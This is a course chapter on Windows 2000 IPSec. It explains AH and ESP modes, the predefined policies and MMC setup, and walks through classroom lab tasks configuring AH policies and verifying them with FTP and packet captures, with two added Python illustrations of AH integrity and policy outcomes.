ESP in Transport Mode

In Transport Mode, ESP encrypts and authenticates application data, such as email, Web pages, and so forth; however, it does not protect the IP addresses. If a packet is captured and analyzed by an attacker, the data is encrypted but the sender and receiver IP address information is freely available. Both hosts in the communication must have IPSec installed and configured, and Transport Mode can never hide who is talking to whom, only what they are saying.

ESP in Tunnel Mode

In Tunnel Mode, ESP encrypts and authenticates application data, just as in Transport Mode. In this situation, the ultimate source and destination IP addresses are also encrypted because they are encapsulated (tunneled). IPSec is implemented on the tunnel endpoints, and is not required on the hosts themselves. If this packet is captured and analyzed by an attacker, the attacker can determine only that a packet of a certain size was sent between the two tunnel endpoints. None of the contents, including the original source and destination, can be read. Of course, the outer IP header (that of the tunnel endpoints) can be read.

AH in Transport Mode

AH provides authentication and integrity for the application data and for the IP header. AH does not provide encryption services like ESP, only authentication services (as the name indicates). In Transport Mode, there is a similarity to ESP in that both end hosts must have IPSec installed and configured.

AH in Tunnel Mode

In Tunnel Mode, AH authenticates application data from one endpoint to another, often network gateways or firewalls. There is no encryption provided, only authentication. If ESP authentication is turned on, AH is rarely implemented in Tunnel Mode.
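The following is an added illustration, not part of the course text and not Microsoft's code. It builds a minimal IPv4 packet, wraps it in an Authentication Header for both Transport Mode (AH in front of a TCP segment) and Tunnel Mode (AH in front of a whole inner IP packet), and computes the HMAC-MD5-96 integrity check value the way RFC 2402 specifies: over the IP header with its mutable fields zeroed, the AH header with the ICV zeroed, and everything after it. It then shows why a TTL decrement by a router is harmless to AH while a NAT rewrite of the source address is not, and that in AH Tunnel Mode the inner addresses are integrity-protected but still readable. The key, addresses and payload are constructed sample values; a real AH key is derived by IKE.

```python
"""AH integrity over Transport Mode and Tunnel Mode packets (RFC 2402 style).

Added example with constructed inputs; not course material or Microsoft code.
"""
import hashlib
import hmac
import struct

AH_PROTO = 51          # IP protocol number that identifies an AH header
ICV_LEN = 12           # HMAC-MD5-96 truncates the 16-byte MAC to 96 bits
AH_LEN = 12 + ICV_LEN  # fixed AH fields plus the ICV


def ip4(addr):
    return bytes(int(octet) for octet in addr.split("."))


def ipv4_header(src, dst, proto, total_len, ttl=64):
    # version/IHL, TOS, total length, ID, flags/frag offset, TTL, protocol,
    # header checksum (left 0 here: AH zeroes it before hashing anyway), src, dst
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000,
                       ttl, proto, 0, ip4(src), ip4(dst))


def ah_header(next_header, spi, seq, icv=b"\x00" * ICV_LEN):
    # next header, payload length in 32-bit words minus 2, reserved, SPI, sequence, ICV
    return struct.pack("!BBHII", next_header, AH_LEN // 4 - 2, 0, spi, seq) + icv


def zero_mutable(ip_hdr):
    """Fields a router may legitimately change are excluded from the ICV."""
    h = bytearray(ip_hdr)
    h[1] = 0                  # TOS
    h[6:8] = b"\x00\x00"      # flags / fragment offset
    h[8] = 0                  # TTL
    h[10:12] = b"\x00\x00"    # header checksum
    return bytes(h)


def ah_icv(key, ip_hdr, ah_zeroed, payload):
    mac = hmac.new(key, zero_mutable(ip_hdr) + ah_zeroed + payload, hashlib.md5).digest()
    return mac[:ICV_LEN]


def build_ah_packet(key, src, dst, spi, seq, next_header, payload):
    """Transport Mode when payload is a TCP segment (next_header 6);
    Tunnel Mode when payload is a whole inner IP packet (next_header 4)."""
    ip_hdr = ipv4_header(src, dst, AH_PROTO, 20 + AH_LEN + len(payload))
    icv = ah_icv(key, ip_hdr, ah_header(next_header, spi, seq), payload)
    return ip_hdr + ah_header(next_header, spi, seq, icv) + payload


def verify_ah(key, packet):
    ip_hdr, ah = packet[:20], packet[20:20 + AH_LEN]
    expected = ah_icv(key, ip_hdr, ah[:12] + b"\x00" * ICV_LEN, packet[20 + AH_LEN:])
    return hmac.compare_digest(ah[12:], expected)


def with_ttl(packet, ttl):
    p = bytearray(packet)
    p[8] = ttl
    return bytes(p)


def with_src(packet, src):
    p = bytearray(packet)
    p[12:16] = ip4(src)
    return bytes(p)


def demo():
    key = b"constructed-ah-session-key"   # constructed; IKE derives the real one
    tcp = b"\x07\xe9\x00\x15" + b"\x00" * 16 + b"USER anonymous\r\n"  # constructed segment
    transport = build_ah_packet(key, "172.26.10.1", "172.26.10.2", 0x1000, 1, 6, tcp)
    inner = ipv4_header("10.1.1.5", "10.2.2.7", 6, 20 + len(tcp)) + tcp
    tunnel = build_ah_packet(key, "192.0.2.1", "198.51.100.1", 0x2000, 1, 4, inner)
    return {
        "transport_ok": verify_ah(key, transport),
        # a router decrementing TTL is expected and does not break AH
        "after_ttl_decrement": verify_ah(key, with_ttl(transport, 63)),
        # a NAT device rewriting the source address does break it
        "after_nat": verify_ah(key, with_src(transport, "203.0.113.5")),
        "tunnel_ok": verify_ah(key, tunnel),
        # the inner header is covered by the ICV but, with AH alone, still readable
        "inner_addresses_visible": tunnel[20 + AH_LEN + 12:20 + AH_LEN + 20] == inner[12:20],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run it and compare the two failing and passing cases: the ICV survives the TTL change only because AH deliberately hashes the TTL as zero, and the NAT case fails because the source address is one of the immutable fields AH protects. Swap hashlib.md5 for hashlib.sha1 to get the HMAC-SHA-1-96 variant the Security Methods dialog also offers.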

IPSec Implementation

As you identified in the previous section, there are various modes of implementing IPSec. One of the primary questions to answer is: Where are the endpoints in your network going to be? Are the endpoints the actual hosts? Or are the endpoints the firewalls?

If true end-to-end security is required between two hosts, then implementingIPSec on each host is the way to go. However, scaling that up to all the hosts inthe network can become difficult to implement and manage.

Imagine that you and your co-workers all pass open notes to each other in your organization. In order to prevent a third user from seeing the note sent between any two users, you build an infrastructure of opaque PVC pipes between each coworker in your organization. If there are a total of five workers, you have to have an infrastructure of [5 x (5-1)]/2, or 10 pipes. In this office, each person holds four pipes. Now, increase the number of workers to 100. You will need an infrastructure of [100 x (100-1)]/2, or 4950 pipes, and each person holds 99 pipes. Lots of secure links to pass things back and forth through, but not that efficient overall.

authenticate: To establish the validity of a claimed user or object.

firewall: A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical firewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.

This is what happens when you implement IPSec host to host in Transport Mode: you create a separate virtual secure pipe between each host and every other host it needs to talk to.

If host-to-host implementation is chosen, the likely solution will be to use theIPSec function of the OS, such as Windows 2000. If this is the case, IPSec func-tions normally, at the Network layer, performing its function and moving on.

Sometimes though, IPSec may be implemented underneath an existing implemen-tation of the IP protocol stack, between the native IP and the local networkdrivers (see RFC 2401). In such a scenario, this is referred to as a “Bump in theStack” implementation.

Yet another option for IPSec implementation is to use a dedicated piece of hardware. This equipment attaches to an interface or a router and performs the encryption and decryption outside the host's own protocol stack. This is called a "Bump in the Wire" implementation. It offers excellent performance for the cryptographic processing. It is not suitable for all implementations, however, as adding a dedicated physical device to each link may not be a budgetary option for an organization.

TASK 2A-1: Describing the Need for IPSec

1. Why is IPSec becoming a requirement in networks that need securecommunication?

There is no security in the standard IP that is used today. IP traffic can be captured, analyzed, and more, with nothing to prevent it. IPSec allows for the security of the actual packets themselves, without relying on Application-level encryption.

Topic 2B: IPSec Policy Management

Implementing and managing IPSec policies in Windows is accomplished by using the Microsoft Management Console. In this topic, you will use the MMC to perform the many tasks of IPSec implementation.

The MMC

Microsoft introduced the Microsoft Management Console (MMC) in Windows NT. The MMC is a highly configurable tool used to manage and configure system and application settings.


In the first task, you will become familiar with the MMC configuration options and create some customized settings. The MMC, as you first use it, is blank; you select the configuration options. In Figure 2-1, you will see that there are two menu bars. The first belongs to the overall MMC, called Console1 by default, and has three menus: Console, Window, and Help. The second contains the commands for the currently selected item (a snap-in, or the console root that holds the snap-ins). The default item is called Console Root. It has three commands: Action, View, and Favorites.

In the default item, Console Root, there are two tabs: Tree and Favorites. The Tree tab shows the items that are available in this console. Items can include folders, Web pages, other snap-ins, and more. The Favorites tab is used to manage shortcuts to items in the Console Tree. This enables you to create a customized grouping of tools and shortcuts that you frequently use to manage aspects of your system.

The Tree and Favorites tabs are located in what is called the Left Pane of thesnap-in. This is where the options are expanded, and selected, and possibly addedto Favorites. On the right side of the dividing line is what is called the RightPane. In the Right Pane, you will find the details of any object that is selected inthe Left Pane.

Figure 2-1: The blank MMC console.

TASK 2B-1: Examining the MMC

Setup: You are logged on to Windows 2000 Server as Administrator.

1. From the Start menu, choose Run.

2. In the Run box, enter mmc to start the Microsoft Management Console.

3. Choose Console→Add/Remove Snap-In.

4. On the Standalone tab, click Add.


5. Scroll down, select IP Security Policy Management, and click Add.

6. If necessary, select Local Computer, and click Finish.

7. Click Close to close the Add Standalone Snap-in dialog box.

8. Click OK, and leave the MMC open for the next task.

IPSec Policies

In Windows 2000, there are predefined IPSec security policies. These policies allow for implementation of IPSec with minimal effort on the part of the administrator. As an administrator, you must identify the needs for IPSec in your environment, then enable the proper policy to meet those needs. The three predefined policies are:

• Client (Respond Only): used for normal, unsecured communication. Any Windows 2000 machine (Professional or Server) with this policy assigned can communicate using IPSec when a peer requires or requests it, but it never initiates IPSec when it opens a connection itself.

• Secure Server (Require Security): used when all IP network traffic must be secured. Any Windows 2000 machine (Professional or Server) with this policy assigned always enforces IPSec with its peers and does not fall back to unsecured communication. Note the one predefined exception: the policy's All ICMP Traffic rule is set to Permit, so ping still works in the clear unless you change that rule.

• Server (Request Security): used when IP traffic should be secured where possible, while still allowing unsecured communication with clients that do not respond to the request. Any Windows 2000 machine (Professional or Server) with this policy assigned first tries to negotiate IPSec; if the other machine cannot use IPSec, it falls back to unsecured communication.

TASK 2B-2: Identifying Default IPSec Security Policies

Setup: You are logged on to Windows 2000 Server as Administrator,the MMC is running, and the IP Security Policy Managementsnap-in has been added.

1. In the left pane, select IP Security Policies On Local Machine. Three poli-cies are shown in the right pane.

security policies: The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information.

These policies are also available in Windows XP.


2. Examine the three policies to see if any are currently assigned.

By default, they are not assigned.

3. Leave the MMC open for the next task.

Saving the Customized MMC Configuration

Since you have configured the MMC just as you wish, you should save this configuration so that it is easy to bring back up. Although you can go through the steps of adding the snap-in as you did earlier, doing so each time is cumbersome, and is not required.

TASK 2B-3: Saving a Customized MMC

Setup: You are logged on to Windows 2000 Server as Administrator,the MMC is running, and the IP Security Policy Managementsnap-in has been added.

1. Choose Console→Exit.

2. When you are asked if you wish to save the console settings, click Yes.

3. Save the file as ipsec.mmc.msc.

4. Verify the new addition by choosing (from the Start menu) Programs→Administrative Tools→ipsec.mmc.msc. Your saved MMC opens just as youhad customized it to do so.

The Secure Server (Require Security) Policy

In the following sections, you will examine the settings of each of the three predefined policies. The most secure policy, Secure Server (Require Security), is the policy that states that all communication must be secured, with no exceptions.

The General Tab

As the name implies, the General tab provides general information and configuration options for the Secure Server (Require Security) policy.

You will be using this console repeatedly throughout this lesson, so you might want to create a shortcut for it on the Windows Desktop.


Figure 2-2 shows the settings for Key Exchange. Keys are used as part of the different forms of encryption that can be implemented in the IPSec policy. IKE stands for Internet Key Exchange, and deals with the method of exchanging the cryptographic key(s). SHA1 and MD5 are both hash algorithms, used as keyed hashes (HMACs) to verify the integrity of a message. 3DES and DES are the encryption algorithms that protect the key exchange itself, and the Diffie-Hellman Group selects the size of the modulus used to agree on keying material, which bounds the strength of every key derived from the exchange.

Figure 2-2: The Key Exchange Security Methods dialog box.

These settings work together to determine the integrity, confidentiality, andstrength of the secured communication.

• Integrity is determined by the SHA1 or MD5 algorithm.

• Confidentiality is determined by the 3DES or DES algorithm.

• Strength is determined by the Diffie-Hellman Group. Windows 2000 offers Low (1), which uses a 768-bit modulus, and Medium (2), which uses a 1024-bit modulus. The larger group costs more CPU time per negotiation, but every session key derived from the exchange is only as strong as this agreement.

TASK 2B-4: Examining Security Methods

Setup: You are logged on to Windows 2000 Server as Administrator,and the ipsec.mmc.msc console is open.

1. In the right pane, right-click Secure Server (Require Security), andchoose Properties.

2. Select the General tab.

3. Observe that the default value for Check For Policy Changes Every is180 minutes. Every 3 hours, the machine (if it is a domain member) willcheck with Windows Active Directory to see if this policy, when assigned,has changed.

These algorithms are discussed in detail in the prerequisite courses.

DES: (Data Encryption Standard) Definition 1: An unclassified crypto algorithm adopted by the National Bureau of Standards for public use. Definition 2: A cryptographic algorithm for the protection of unclassified data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.


4. Under Key Exchange Using These Settings, click Advanced.

5. In the Key Exchange Settings dialog box, click Methods.

6. Examine the default settings for the security used in Secure Server(Require Security).

7. Close all windows without changing the properties.

The Rules Tab for the Secure Server (Require Security) Policy

The Rules section of an IPSec policy (in this case, the Secure Server (Require Security) policy) contains the actual security sections of the policy pertaining to traffic and actions. The IP Filter List defines the types of network traffic that are affected by this policy. The predefined rules in a policy can be modified, but cannot be removed. The default rules are for All IP Traffic, All ICMP Traffic, and <Dynamic>.

In addition to the IP Filter List is the Filter Action: what the system does when a packet matches a rule's filter list, such as All IP Traffic. When more than one filter matches, the most specific filter wins, so the All ICMP Traffic rule, not the All IP Traffic rule, decides what happens to a ping. There are three actions, which are listed as:

• Permit: Allow unsecured IP packets to pass.

• Require Security: Requires secured communication.

• Default Response: Follow the negotiations as initiated by the other computer.This is especially useful when no other rule applies. In fact, it is the onlyfilter action for the Client (Respond Only) predefined policy.
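The following is an added simulation, not part of the course text and not Windows code. It models the three predefined policies exactly as their Rules tabs describe them (an ordered list of filter list and filter action, with the Dynamic rule only ever answering a peer's negotiation) and derives what happens to traffic between any two hosts, including a host with no IPSec at all. The model's assumptions follow the text: the Server and Secure Server policies permit ICMP in the clear, Server falls back to clear text when the peer will not negotiate, Secure Server does not, Client never initiates a negotiation, and a host whose rule is Request or Require Security answers an unsecured inbound packet by negotiating back with a peer that can respond.

```python
"""Outcome matrix of the predefined Windows 2000 IPSec policies.

Added simulation of the behaviour the course describes; not Windows code.
"""

PERMIT, REQUEST, REQUIRE, RESPOND = ("Permit", "Request Security",
                                     "Require Security", "Default Response")

# Ordered (filter list, filter action) pairs as the Rules tab shows them.
POLICIES = {
    None:            [],                                        # host without IPSec
    "Client":        [("<Dynamic>", RESPOND)],
    "Server":        [("All ICMP Traffic", PERMIT), ("All IP Traffic", REQUEST),
                      ("<Dynamic>", RESPOND)],
    "Secure Server": [("All ICMP Traffic", PERMIT), ("All IP Traffic", REQUIRE),
                      ("<Dynamic>", RESPOND)],
}


def filter_matches(filter_list, proto):
    # <Dynamic> matches no outbound traffic; it exists only to answer a peer's negotiation.
    if filter_list == "All ICMP Traffic":
        return proto == "icmp"
    return filter_list == "All IP Traffic"


def filter_action(policy, proto):
    """Action a host applies to traffic of this protocol; unmatched traffic passes in the clear."""
    for filter_list, action in POLICIES[policy]:
        if filter_matches(filter_list, proto):
            return action
    return PERMIT


def can_respond(policy):
    return any(action == RESPOND for _, action in POLICIES[policy])


def outcome(sender, receiver, proto="tcp"):
    """What happens to traffic the sender originates toward the receiver."""
    send = filter_action(sender, proto)
    if send in (REQUEST, REQUIRE):
        # the sender opens IKE; a peer with a Default Response rule answers
        if can_respond(receiver):
            return "secured"
        return "unsecured" if send == REQUEST else "blocked"
    # the sender transmits in the clear; the receiver's own rule decides what to do with it
    recv = filter_action(receiver, proto)
    if recv == REQUIRE:
        return "secured" if can_respond(sender) else "blocked"
    if recv == REQUEST:
        return "secured" if can_respond(sender) else "unsecured"
    return "unsecured"


def matrix(proto="tcp"):
    names = [None, "Client", "Server", "Secure Server"]
    return {(s, r): outcome(s, r, proto) for s in names for r in names}


if __name__ == "__main__":
    for (s, r), result in matrix().items():
        print(f"{s or 'no IPSec':14} -> {r or 'no IPSec':14}: {result}")
    print("no IPSec -> Secure Server, ping:", outcome(None, "Secure Server", "icmp"))
```

Two rows of the printed matrix are the ones worth checking in the lab later in this lesson: two Client (Respond Only) machines never secure anything, because neither side ever starts a negotiation, and a host with no IPSec can still ping a Secure Server because of the predefined ICMP Permit rule even though every TCP connection to it is blocked.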


Figure 2-3: The default filter lists and filter actions, as shown on the Require Security Rules tab.

In addition to the IP Filter List and the Filter Actions on the Rules tab shown inFigure 2-3, there are other sections that deserve noting. These are the Authentica-tion, Tunnel Setting, and Connection Type options, described in the followingsection and shown in Figure 2-4.

• The Authentication Methods are used to define how a trust will be established between the two communicating hosts. By default, this is the Kerberos method. The other valid options (in addition to Kerberos) are to use a certificate from a Certificate Authority (CA), or to use a predefined shared key string.

• The Tunnel Setting is used to define if this communication is to use a tunnel,and if so, what the IP address for the end of the tunnel is. The endpoint isthe tunnel computer that is closest to the IP traffic destination.

• The Connection Type is used to define the types of connections to which therule will apply. For example, the default setting is All Network Connections.The second option is to have the rule apply only to Local Area Network(LAN) traffic, and the third option is to have the rule only apply to RemoteAccess traffic.

Figure 2-4: The authentication methods, tunnel settings, and connection types, as shown on the Require Security Rules tab.

TASK 2B-5: Examining Policy Rules

Setup: You are logged on to Windows 2000 Server as Administrator.

1. Reopen the ipsec.mmc.msc console.

2. In the right pane, right-click Secure Server (Require Security), andchoose Properties.

3. If necessary, select the Rules tab.

LAN: (Local Area Network) A computer communications system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communications system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, front-end processors, controllers, and servers.


4. Examine the default settings for IP Filter List, Filter Action, Authentica-tion Methods, Tunnel Setting, and Connection Type.

5. Select the All IP Traffic rule, and click the Edit button.

6. Observe the configuration options that can be adjusted in this section.

7. When you are done reviewing the configuration options, click Cancel twice.

8. Close the ipsec.mmc.msc console, without saving changes.

Topic 2C: IPSec AH Implementation

You now have all of the information and tools you need to be able to implement IPSec. Let's try it out.

About the Tasks

For the following tasks, you will work in pairs. The text and activities refer to the two machines as Student_P and Student_Q. These machines are connected to the classroom hub as well as to each other via a crossover cable. You will disable the interfaces that are connected to the classroom hub and enable the interfaces that are connected to each other. This way, you can isolate each pair of machines into their own little networks and not interfere with other student pairs.

Student_P will initiate communications with Student_Q. Student_Q will dictatewhether it has an IPSec policy enabled. If so, it then determines if it shouldrequest or require Student_P to do the same. On Student_P, at first you will haveno IPSec Respond policy activated, but later you will have a Respond policy. Youwill capture traffic between these two computers using Network Monitor, and per-form an analysis on the traffic.

You will also use the options for configuring policies. You will use just the AHprotocol (authenticity/integrity). Then, you will use just the ESP protocol(confidentiality). Following that, you will use AH with ESP. Also, ESP will beconfigured to use its integrity algorithm. Finally, because the integrity algorithmscan be implemented in two flavors (SHA-1 or MD5) and the encryption algo-rithms for confidentiality can also be implemented in two flavors (DES or 3DES),you’ll use combinations of these.

As a policy maker for a company, you’ll have to make such decisions before youimplement IPSec. These are the actual tools you can use in Windows 2000 toimplement your policies.


TASK 2C-1: Preparing the System Setup and Configuration

Note: Perform this task on all student machines.

1. Open the Network And Dial-up Connections Control Panel.

2. Disable the Classroom Hub interface.

3. Verify that the Partner interface is enabled.

4. Verify your IP addresses. Generally, if the IP address of the interface con-nected to the classroom hub is 172.16.10.x or 172.18.10.x, then the IPaddress of the interface connected via the crossover cable to your partner’smachine will be 172.26.10.x or 172.28.10.x.

5. Verify connectivity by pinging your partner’s IP address. Both studentmachines should be able to ping each other successfully.

6. Close all open windows.

Creating Custom IPSec Policies

In the previous topic, you examined the default IPSec policies in Windows 2000. For the remainder of the lesson, you will create and use your own customized IPSec policies. This will enable you to fully create and secure network traffic based on your unique configuration requirements. The following figures can be used as a reference while performing the tasks of this section.

If you are unsure about the classroom configuration, check with your instructor.


Figure 2-5: Opting not to use the Add Wizard.

When you are creating a new policy, you will need to add and configure all theoptions you previously examined. In these tasks, you will be customizing thepolicies, one by one, and do not want to use the Add Wizard, because the AddWizard will walk you through specific predefined steps. At this stage, you want toperform everything manually.


Figure 2-6: The Security Methods tab, showing the leftmost part of the Security Method Preference Order.

During policy creation, you will be presented with the Security Methods tab. At this stage, you will see five columns presented: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec), but you might need to scroll to see all five.


Figure 2-7: The Security Methods tab, showing the rightmost part of the Security Method Preference Order.

Security methods are listed in order of preference that this machine will use whenattempting to negotiate IP Security when dealing with another machine thatresponds that it can use IPSec, too. You can add, edit, or remove any of thesemethods. In this case, since you will have named this policy 1_REQUEST_AH(md5)_only, you will simplify the list and offer exactly one choice: Request IPSecurity that relies only on AH Integrity using the MD5 hashing algorithm. Donot worry about key lifetimes at this stage.

TASK 2C-2: Creating the 1_REQUEST_AH(md5)_only Policy

Note: Perform this task only if you are designated as Student_Q.

1. Open the ipsec.mmc.msc console.

2. In the right pane, right-click and choose Create IP Security Policy, thenclick Next.

3. For the IP Security Policy Name, enter 1_REQUEST_AH(md5)_only, andclick Next.

4. Uncheck Activate The Default Response Rule, and click Next.

5. Uncheck Edit Properties, and click Finish.


6. Double-click the new policy 1_REQUEST_AH(md5)_only.

7. On the Rules tab, uncheck Use Add Wizard, and click Add.

8. On the IP Filter List tab, click the radio button for All IP Traffic.

9. Switch to the Filter Action tab.

10. Click the radio button for Request Security (Optional).

11. Click Edit.

12. Verify that the radio button for Negotiate Security is selected.

13. Read the options presented to you under Security Method PreferenceOrder.

14. Remove all but one Security Method by holding down the Shift key,selecting all but one of the choices, and clicking Remove.

15. When prompted with Are You Sure?, click Yes.

16. Select the remaining method, and click Edit.

17. Under Security Method, click the Settings button found under Custom (ForExpert Users)—as you’re on your way to becoming an expert on IPSec.

18. Verify that AH is checked and that the integrity algorithm is MD5.

19. If necessary, uncheck ESP.

20. Under Session Key Settings, uncheck both check boxes.

21. Click OK three times to return to the New Rule Properties dialog box.

22. Leave the New Rule Properties open for the next task.


Editing Authentication Method Policies

When you are creating this customized policy, you are going to use only AH, and not ESP. So, when you are customizing the settings, be sure to uncheck the ESP options and to check the AH options. You should also clear the check boxes for generating new keys, both for size (Kbytes) and time (seconds).

Figure 2-8: The Authentication Method tab.

Notice that three authentication methods are supported: Kerberos, Certificates, and Preshared Keys. You will use the third method, as it is simple to implement, for now. In a production environment, if you have a homogeneous Windows 2000 domain implementation, you could leave it at the default Kerberos; in a heterogeneous network, you could choose to set up a CA and distribute IPSec certificates.

TASK 2C-3 Editing the 1_REQUEST_AH(md5)_only Policy

Note: Perform this task only if you are designated as Student_Q.

1. Verify that the New Rule Properties are displayed.

2. Select the Authentication Methods tab.

3. Click Edit.

4. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide text for the preshared key.


Click OK to close the Edit Authentication Methods Properties dialog box.

5. Switch to the Tunnel Setting tab, but leave the settings alone. You will be working in Transport Mode only.

6. Switch to the Connection Type tab, but leave the settings alone. You will use the default of All Network Connections.

7. Click Close to close the Rule Properties. Keep the Policy Properties open for the next task.

Setting Up the Computer’s Response

You have just configured a policy where Student_Q will request any other computers that attempt to communicate with it to implement AH by using the MD5 algorithm. Let’s assume that this policy is put into effect, and another computer says that it can communicate with Student_Q by using AH, as well. Student_Q should be in a position to respond to this. Therefore, you should now configure the Default Response rule in this policy for Student_Q.

Figure 2-9: Preparing to modify the default response.

To modify the rule, you will not use the Add Wizard. Once you click Edit, you will again be presented with the tabs for Security Methods, Authentication Methods, and Connection Types.


Figure 2-10: Editing Security Methods.

Under Security Methods, you will again see five columns presented: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec). As before, you can add, edit, or remove any of these methods.

In this case, this policy is named 1_REQUEST_AH(md5)_only, but because it will also have to respond to IPSec requests, you’ll simplify the list and offer exactly one choice: Respond to IP Security that relies only on AH integrity using the MD5 hashing algorithm. As before, you don’t need to worry about the key lifetimes.

TASK 2C-4 Configuring the Policy Response

Note: Perform this task only if you are designated as Student_Q.

1. Verify that the properties for the 1_REQUEST_AH(md5)_only policy are displayed.

2. On the Rules tab, check <Dynamic> Default Response, and click Edit. (The Use Add Wizard check box should remain unchecked.)

3. Remove all but one Security Method by holding down the Shift key, selecting all but one of the choices, and clicking Remove.

4. When prompted with Are You Sure?, click Yes.


5. Select the remaining method, and click Edit.

6. Under Security Method, click the Settings button found under Custom (For Expert Users).

7. Verify that the box beside AH is checked and that the integrity algorithm is MD5.

8. Verify that ESP is unchecked.

9. Under Session Key Settings, verify that the options for generating new keys for both size and time are unchecked.

10. Click OK twice to return to the Edit Rule Properties.

11. Switch to the Authentication Methods tab.

12. Click Edit.

13. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

14. Click OK.

15. Switch to the Connection Type tab, and verify that the setting is the default of All Network Connections.

16. Click OK, and then click Close.

17. Close the ipsec.mmc.msc console, without saving changes.

Configuring AH in Both Directions

You have configured a policy where Student_Q will request other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q is also in a position to respond by using this algorithm. Now, let’s configure Student_P to follow Student_Q’s lead.

TASK 2C-5 Configuring the Second Computer

Note: Perform this task only if you are designated as Student_P.

1. Open the ipsec.mmc.msc console. In the right pane, right-click and choose Create IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 1_RESPOND_AH(md5)_only, and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.


4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy 1_RESPOND_AH(md5)_only.

6. On the Rules tab, uncheck Use Add Wizard, check <Dynamic> Default Response, and click Edit.

7. Remove all choices but one by holding down the Shift key, selecting all but one of the choices, and clicking Remove.

8. When prompted with Are You Sure?, click Yes.

9. Select the remaining method, and click Edit.

10. Under Security Method, click the Settings button found under Custom (For Expert Users).

11. Verify that AH is checked and that the integrity algorithm is MD5.

12. Verify that ESP is unchecked.

13. Under Session Key Settings, verify that the boxes for generating new keys for both time and size are unchecked.

14. Click OK twice to return to the Rule Properties.

15. Switch to the Authentication Methods tab.

16. Click Edit.

17. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

18. Click OK.

19. Switch to the Connection Type tab, and verify that the default setting of All Network Connections is selected.

20. Click OK, and then click Close to finish the creation of the policy.

21. Close the ipsec.mmc.msc console, without saving changes.

Configuring FTP

Now that IPSec policies are configured on two machines, you need to test the policies to ensure that they work as you intended them to work. To do this, you’ll bring up an FTP site on Student_Q and attempt to access this FTP site from Student_P. You’ll do this with IPSec implemented on one machine and then on the other. You’ll run Network Monitor to capture and record traffic between the two machines. You’ll examine these captures and see where (in the packet) the IPSec headers reside. For greater clarity, we can verify this with the RFCs associated with IPSec, as well.


TASK 2C-6 Setting Up the FTP Process

Note: Perform step 1 through step 6 only if you are designated as Student_Q.

1. From the Start menu, choose Programs→Administrative Tools→Internet Services Manager.

2. In the left pane, click your ftp server’s name. Verify that your default FTP site is running. Verify its properties, and find out where the home directory is physically located. The default home directory is the \inetpub\ftproot folder.

3. Close Internet Services Manager.

4. In Explorer, locate and navigate to the folder designated as the FTP home directory.

5. In this folder, create a text document. Edit this document to input some text and save it as text1.txt.

6. Create and save three more similar text documents in the same folder. Use text2.txt, text3.txt, and text4.txt as the file names.

Note: Perform step 7 through step 12 only if you are designated as Student_P.

7. Open a command prompt.

8. Enter ftp IP_address_of_Student_Q to ftp to Student_Q’s FTP site.

9. Log on as anonymous with no password.

10. Verify that you can access the text documents created on the Student_Q computer, by using the DIR command.

11. Once you have verified that you can access the text documents, quit the ftp session by entering bye at the ftp prompt.

12. Leave this command prompt open.

Implementing the IPSec Policy

You have just tested a plain text ftp session. The following tasks will walk you through the process of implementing IPSec, and testing the results in both directions. First, you will prove that you can connect, even though IPSec is implemented on only one of the hosts.


TASK 2C-7 Implementing the 1_REQUEST_AH(md5)_only Policy

Note: Perform step 1 through step 4 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_AH(md5)_only policy and choose Assign.

2. Close the ipsec.mmc.msc console. If you are prompted to save changes, click No.

3. Start Network Monitor, and verify that it is going to collect packets from the interface connected to Student_P.

4. Start a new capture, and allow Network Monitor to capture packets until Student_P has completed step 5 through step 9.

Note: Perform step 5 through step 9 only if you are designated as Student_P.

5. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.

6. Log on as anonymous with no password.

7. Enter dir to see a list of files hosted on the ftp site.

8. Exit the ftp session.

9. Leave the command prompt open.

Request-only Session Analysis

Why was your attempt successful? What is the reason for the brief delay? This is because the policy is designed to request only—not demand—IPSec. If the remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. The brief delay occurred because Student_Q was trying to establish an IPSec communication with Student_P.

You will be using Network Monitor repeatedly throughout this course, so you might want to create a shortcut for it on the Windows Desktop.


TASK 2C-8 Analyzing the Request-only Session

Note: Perform this task only if you are designated as Student_Q.

1. In Network Monitor, stop and view the capture.

2. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4).

3. In frame 4, observe that the protocol is ISAKMP (UDP port 500). When it does not hear from Student_P, it tries again approximately a second later. When it does not hear from Student_P again, it falls back to insecure communication, and the three-way handshake proceeds as before (in frames 6, 7, and 8). Once the connection is made, the session is established in clear text, with no IPSec. You are able to see the payload and full headers of all the packets, with no evidence of IPSec.

4. Close Network Monitor. You can save your capture to a file, if you like.

Implementing a Request-and-Respond Policy

In the previous task, you were able to see that even though you had IPSec enabled in one direction, the policy allowed for unsecured communication. When Student_P responded with no IPSec, Student_Q went ahead and accepted the session, and traffic continued without IPSec. In the next task, you will configure Student_P to respond to Student_Q’s IPSec policy.

